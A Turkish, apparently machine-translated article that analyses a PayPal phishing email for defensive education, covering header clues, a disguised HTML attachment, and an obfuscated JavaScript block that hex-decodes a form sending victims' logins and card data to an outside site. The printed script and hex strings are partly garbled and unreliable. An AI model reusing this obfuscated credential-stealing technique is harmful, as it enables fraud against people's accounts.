Herkesin bilgilerinin çevrimiçi olduğu günümüz dünyasında, kimlik avı en popüler ve yıkıcı çevrimiçi saldırılardan biridir, çünkü her zaman bir virüsü temizleyebilirsiniz, ancak banka bilgileriniz çalınırsa başınız belaya girer. İşte aldığımız böyle bir saldırının dökümü.
Önemli olanın sadece bankacılık bilgileriniz olduğunu düşünmeyin: Sonuçta, birisi hesabınızın girişini kontrol ederse, sadece o hesapta bulunan bilgileri bilmekle kalmaz, aynı zamanda aynı giriş bilgilerinin çeşitli başka yerlerde de kullanılabileceği ihtimali vardır. hesaplar. E-posta hesabınızı tehlikeye atarlarsa, diğer tüm şifrelerinizi sıfırlayabilirler.
Bu nedenle, güçlü ve değişken şifreleri korumanın yanı sıra, her zaman gerçek gibi görünen sahte e-postalara dikkat etmelisiniz. Kimlik avı girişimlerinin çoğu amatörce olsa da, bazıları oldukça ikna edicidir, bu nedenle onları yüzey düzeyinde nasıl tanıyacağımızı ve kaputun altında nasıl çalıştıklarını anlamak önemlidir.
Resim asirap
Düz Görüşte Olanları İncelemek
Örnek e-postamız, çoğu kimlik avı girişiminde olduğu gibi, PayPal hesabınızda normal koşullar altında endişe verici olabilecek etkinlik hakkında sizi "bilgilendirir". Dolayısıyla, harekete geçirici mesaj, aklınıza gelebilecek hemen hemen her kişisel bilgi parçasını göndererek hesabınızı doğrulamak / geri yüklemektir. Yine, bu oldukça formülsel.
Kesinlikle istisnalar olsa da, hemen hemen her kimlik avı ve dolandırıcılık e-postası doğrudan mesajın içinde kırmızı bayraklarla yüklenir. Metin inandırıcı olsa bile, genellikle mesaj gövdesinde mesajın okunaklı olmadığını gösteren birçok hata bulabilirsin.
Mesaj Gövdesi
İlk bakışta gördüğüm en iyi kimlik avı e-postalarından biri bu. Yazım veya gramer hatası yoktur ve laf kalabalığı beklediğinize göre okunur. Bununla birlikte, içeriği biraz daha yakından incelediğinizde görebileceğiniz birkaç kırmızı bayrak var.
- "Paypal" - Doğru durum "PayPal" dır (büyük harf P). Mesajda her iki varyasyonun da kullanıldığını görebilirsiniz. Şirketler markaları konusunda çok bilinçli, bu yüzden böyle bir şeyin prova sürecinden geçeceği şüpheli.
- "ActiveX'e izin ver" - Paypal boyutunda yasal bir web tabanlı işletmenin, özellikle birden fazla tarayıcıyı desteklediklerinde yalnızca tek bir tarayıcıda çalışan özel bir bileşen kullandığını kaç kez gördünüz? Elbette, orada bir yerde bazı şirketler bunu yapıyor, ancak bu bir kırmızı bayrak.
- "Güvenli bir şekilde." - Bu kelimenin, paragraf metninin geri kalanıyla kenar boşluğunda nasıl hizalanmadığına dikkat edin. Pencereyi biraz daha uzatsam bile doğru şekilde sarmıyor veya boşluk bırakmıyor.
- "Paypal!" - Ünlem işaretinin önündeki boşluk garip görünüyor. Yasal bir e-postada olmayacağından emin olduğum başka bir tuhaflık.
- "PayPal- Hesap Güncelleme Formu.pdf.htm" - Paypal, özellikle kendi sitelerindeki bir sayfaya bağlantı verebildikleri zaman neden bir "PDF" eklesin? Ek olarak, neden bir HTML dosyasını PDF olarak gizlemeye çalışsınlar? Bu, hepsinin en büyük kırmızı bayrağı.
Mesaj Başlığı
Mesaj başlığına baktığınızda, birkaç kırmızı bayrak daha belirir:
- Gönderen adresi [email protected] .
- Alıcı adresi eksik. Bunu boş bırakmadım, sadece standart mesaj başlığının bir parçası değil. Genellikle adınızın bulunduğu bir şirket e-postayı size göre kişiselleştirir.
Ek
Eki açtığımda, stil bilgileri eksik olduğu için düzenin doğru olmadığını hemen görebilirsiniz. Yine, PayPal size sitelerinde bir bağlantı verebilecekken neden bir HTML formu e-postayla göndersin?
Not: bunun için Gmail’in yerleşik HTML ek görüntüleyicisini kullandık, ancak dolandırıcılardan gelen ekleri AÇMAMANIZI öneririz. Asla. Hiç. Genellikle, hesap bilgilerinizi çalmak için PC'nize truva atları yükleyen istismarlar içerirler.
Biraz daha aşağı kaydırdığınızda, bu formun yalnızca PayPal giriş bilgilerimizi değil, aynı zamanda banka ve kredi kartı bilgilerinizi de istediğini görebilirsiniz. Bazı görüntüler bozuk.
Bu kimlik avı girişiminin her şeyin peşinden tek bir dokunuşla gittiği açıktır.
Teknik Arıza
Bunun bir kimlik avı girişimi olduğu açıkça görülebilecek şekilde açık olsa da, şimdi e-postanın teknik yapısını kırıp ne bulabileceğimize bakacağız.
Ekteki Bilgiler
İlk olarak bakmanız gereken şey, verileri sahte siteye gönderen ek formunun HTML kaynağıdır.
Kaynağı hızlı bir şekilde görüntülerken, her ikisi de yasal olan “paypal.com” veya “paypalobjects.com” a işaret ettikleri için tüm bağlantılar geçerli görünür.
Şimdi, Firefox'un sayfada topladığı bazı temel sayfa bilgilerine göz atacağız.
Gördüğünüz gibi, bazı grafikler yasal PayPal alan adları yerine “blessedtobe.com”, “goodhealthpharmacy.com” ve “pic-upload.de” alanlarından alınmıştır.
E-posta Üstbilgilerinden Bilgiler
Daha sonra ham e-posta mesajı başlıklarına bir göz atacağız. Gmail bunu, iletideki Orijinali Göster menü seçeneği aracılığıyla kullanıma sunar.
Orijinal mesajın başlık bilgilerine baktığımızda, bu mesajın Outlook Express 6 kullanılarak oluşturulduğunu görebilirsiniz. PayPal'ın personelde bu mesajların her birini eski bir e-posta istemcisi aracılığıyla manuel olarak gönderen birinin olduğundan şüpheliyim.
Şimdi yönlendirme bilgilerine baktığımızda, hem gönderenin hem de geçiş yapan posta sunucusunun IP adresini görebiliriz.
"Kullanıcı" IP adresi orijinal göndericidir. IP bilgilerine hızlı bir şekilde baktığımızda, gönderen IP'nin Almanya'da olduğunu görebiliriz.
Ve geçiş posta sunucusunun (mail.itak.at) IP adresine baktığımızda, bunun Avusturya merkezli bir İSS olduğunu görebiliriz. PayPal'ın, bu görevi kolayca yerine getirebilecek devasa bir sunucu çiftliğine sahip olduğunda, e-postalarını doğrudan Avusturya merkezli bir ISS'ye yönlendirdiğinden şüpheliyim.
Veriler Nereye Gidiyor?
Bu nedenle, bunun bir phishing e-postası olduğunu açıkça belirledik ve mesajın nereden geldiği hakkında bazı bilgiler topladık, peki ya verilerinizin nereye gönderildiği?
Bunu görmek için önce HTM ekini masaüstümüzde kaydetmeli ve bir metin düzenleyicide açmalıyız. İçinde gezinirken, şüpheli görünen bir Javascript bloğuna ulaştığımız zamanlar dışında her şey yolunda görünüyor.
Javascript'in son bloğunun tam kaynağını çıkarırken şunu görüyoruz:
<script language = ”JavaScript” type = ”text / javascript”>
// Telif Hakkı © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”, y =”(i = 0; i <x.length i + = 2) için {y+=unescape(‘%’+x.substr(i,2));}document.write (y);
</script>
Bir Javascript bloğuna gömülü, görünüşte rastgele harflerden ve sayılardan oluşan büyük bir karışıklık dizisi gördüğünüzde, bu genellikle şüpheli bir şeydir. Koda bakıldığında, "x" değişkeni bu büyük dizeye ayarlanır ve ardından "y" değişkenine kodu çözülür. "Y" değişkeninin nihai sonucu daha sonra belgeye HTML olarak yazılır.
Büyük dize 0-9 sayılarından ve a-f harflerinden oluştuğundan, büyük olasılıkla basit bir ASCII'den Hex'e dönüştürme yoluyla kodlanmıştır:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f2f7777772e64657870626f737267327f2e64657870626f737267327f2e646578706f73726732742f73742220616374696f6e3d22687474703a2f2f2f7777772e646578706f737267327f57e646578703a2f2f2f7777772f57706
Çevirir:
<form name = ”main” id = ”main” method = ”post” action = ”http://www.dexposure.net/bbs/data/verify.php”>
Bunun, sonuçları PayPal'a değil hileli bir siteye gönderen geçerli bir HTML form etiketine dönüştürmesi tesadüf değildir.
Ek olarak, formun HTML kaynağını görüntülediğinizde, bu form etiketinin Javascript aracılığıyla dinamik olarak oluşturulduğu için görünmediğini göreceksiniz. Bu, eki doğrudan bir metin düzenleyicide açmanın aksine (daha önce yaptığımız gibi) birileri ekin oluşturulan kaynağını görüntülediğinde HTML'nin gerçekte ne yaptığını gizlemenin akıllıca bir yoludur.
Soruna neden olan sitede hızlıca bir açıklama yaptığımızda, bunun popüler bir web barındırıcısı olan 1and1'de barındırılan bir alan adı olduğunu görebiliriz.
Öne çıkan, alan adının okunabilir bir ad kullanması ("dfh3sjhskjhw.net" gibi bir adın aksine) ve alanın 4 yıldır kayıtlı olmasıdır. Bu nedenle, bu alanın ele geçirildiğine ve bu kimlik avı girişiminde piyon olarak kullanıldığına inanıyorum.
Sinizm İyi Bir Savunmadır
Çevrimiçi güvende olmak söz konusu olduğunda, biraz alaycılığa sahip olmak asla zarar vermez.
Örnek e-postada daha fazla kırmızı bayrak olduğundan emin olsam da, yukarıda belirttiğimiz şey sadece birkaç dakikalık incelemeden sonra gördüğümüz göstergelerdir. Varsayımsal olarak, e-postanın yüzey seviyesi meşru muadilini% 100 taklit ederse, teknik analiz yine de gerçek doğasını ortaya çıkaracaktır. Bu yüzden hem görebildiğiniz hem de göremeyeceğinizi inceleyebilmek önemlidir.
